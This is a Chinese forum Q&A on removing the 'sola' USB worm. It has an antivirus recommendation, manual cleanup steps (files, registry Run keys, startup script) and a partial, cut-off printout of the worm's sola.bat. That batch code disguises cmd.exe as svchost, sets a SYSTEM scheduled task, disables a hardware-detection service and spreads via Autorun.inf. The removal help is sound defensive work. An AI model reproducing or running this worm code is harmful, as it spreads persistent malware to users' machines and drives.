怎么解决宅男病毒(sola病毒)？

解除过的回答@

建议楼主使用可牛免费杀毒，最近国内唯一一个通过VB100权威测试的国内杀毒软件，同期水平已经超越国内所有杀毒软极爱你，不占内存，支持兼容其他杀毒软件，贝壳云查杀技术，十分牛B

这是下载地址：http://sd.keniu.com/index.html

解决方法二： 一、进安全模式 1.同样用“资源管理器”进入各盘符目录下，删除隐藏的“SOLA”文件夹和“Autorun.inf”文件 然后去360网站上下载一个“U盘病毒专杀工具”查杀完后弹出窗口“是否……”点击“是”，然后会询问“是否创建XXX” 点击创建，该软件就会在各个盘符下创建一个名问“Autorun.inf”的假病毒文件，这样就能防止病毒再创建此文件。 2.“搜索文件或文件夹”关键字“sola”的所有文件和文件夹，删除所有有关sola这个名字的文件和文件夹。 3.可手动找到并删除下列文件。 %systemroot%\\Fonts\\Regedit.reg %systemroot%\\Fonts\\sleep.exe %systemroot%\\Fonts\\SOLA.BAT %systemroot%\\Fonts\\est_type2032.fon %systemroot%\\Tasks\\Tasks.job %systemroot%\\Fonts\\solasetup %systemroot%\\Tasks\\Tasks.job 4.按创建时间排序，删除所有和其同一时间创建的文件。 5.打开注册表（点击“开始”——“运行”，输入“regedit”，回车） 6.鼠标点选注册表左边目录最上方“我的电脑”，然后点击“编辑”——“查找”，输入“SOLA”删除所有相关的“项”“值”“数据”   注：有些软件的名字中带有“SOLA”，但并不是病毒，要区分开来。（如下图所示就不属于病毒项）病毒的“项”“值”“数据”一般一眼就能看出。 [attach]27266[/attach] ----------------------- 7.木马为了能够在开机后自动运行，往往在注册表如下选项中添加注册表项： HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Run HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunOnce HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunOnceEx HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunServices HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunServicesOnce 删除不明项。（也可用360安全卫士查看启动项） 在“C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动”中有一个SOLA.vbs文件 （注：这里我记得不太清楚了，因为我忘了保存该文件的样本） 8.最后再检查一下所有盘符，看看“SOLA”文件夹是否删除干净，如还存在需再删一次，“Autorun.inf”文件就不需要删除了，那是专杀工具创建用来欺骗病毒的文件。 9.删除你的U盘、MP3等一切USB接口硬件中的“SOLA”文件夹；当然用手机内存读卡器的也会中标。 10.重启电脑，搞定。 下面附上“sola.bat”中的内容： @echo off set sola=%systemroot%\\Fonts set setup=%systemroot%\\Fonts\\solasetup if not \"%1\"==\"-USB\" goto Start start /max .. if exist %sola%\\SOLA.BAT goto End ::========================Infect============================== :Infect cd\\ md %systemroot%\\Fonts\\solasetup ::————文件复制--------- copy sola\\Autorun.inf %setup%\\Autorun.inf copy sola\\SOLA.BAT %setup%\\SOLA.BAT copy sola\\宅男请进.RAR %setup%\\宅男请进.RAR copy sola\\Tasks.xxx %setup%\\Tasks.xxx copy sola\\sleep.exe %setup%\\sleep.exe tasklist >%sola%\\task.txt FOR /F \"tokens=1\" %%i in (\'findstr /I \"svchost.exe\" \"%sola%\\task.txt\"\') do set svchost=%%i copy %systemroot%\\system32\\cmd.exe %sola%\\%svchost% del %sola%\\task.txt :Tasks copy %setup%\\Tasks.xxx %systemroot%\\Tasks\\Tasks.job schtasks /change /ru \"NT AUTHORITY\\SYSTEM\" /tn \"Tasks\" if errorlevel 1 goto TaskFail goto TaskSuc :TaskFail %homedrive% cd \"%ALLUSERSPROFILE%\" cd 「开始」菜单\\程序\\启动 echo On Error Resume Next>SOLA.VBS echo set ws=wscript.createobject(\"wscript.shell\")>>SOLA.VBS echo ws.run \"%sola%\\svchost.exe /c %sola%\\SOLA.BAT\",0 >>SOLA.VBS copy SOLA.VBS %sola%\\SOLA.VBS echo NT>%systemroot%\\Fonts\\NoTasks :TaskSuc attrib %systemroot%\\Tasks\\Tasks.job +s +h +r copy %setup%\\sola.bat %sola%\\sola.bat copy %setup%\\sleep.exe %systemroot%\\system32\\sleep.exe :NoAutoPlay net stop \"Shell Hardware Detection\" echo Windows Registry Editor Version 5.00>%systemroot%\\Fonts\\Regedit.reg echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\ShellHWDetection]>>%systemroot%\\Fonts\\Regedit.reg echo \"Start\"=dword:00000004>>%systemroot%\\Fonts\\Regedit.reg start regedit /s %systemroot%\\Fonts\\Regedit.reg :KillTMG goto End ::======================Infect====================================== ::======================Start======================================= :Start %homedrive% cd \"%ALLUSERSPROFILE%\" cd 「开始」菜单\\程序\\启动 date /t >%sola%\\est_type2032.fon findstr /c:\"-10-01\" \"%sola%\\est_type2032.fon\" if not errorlevel 1 goto DayOn if exist %systemroot%\\Fonts\\NoTasks if not exist SOLA.VBS copy %sola%\\SOLA.VBS SOLA.VBS :Continue sleep 300set C=0 & echo 1>C:\\solachk1 & findstr . C:\\solachk1 & if not errorlevel 1 del C:\\solachk1 & sleep 1000&set C=1 & findstr /C:\"SOLA_1.0\" C:\\Autorun.inf & if errorlevel 1 attrib -s -h -r C:\\Autorun.inf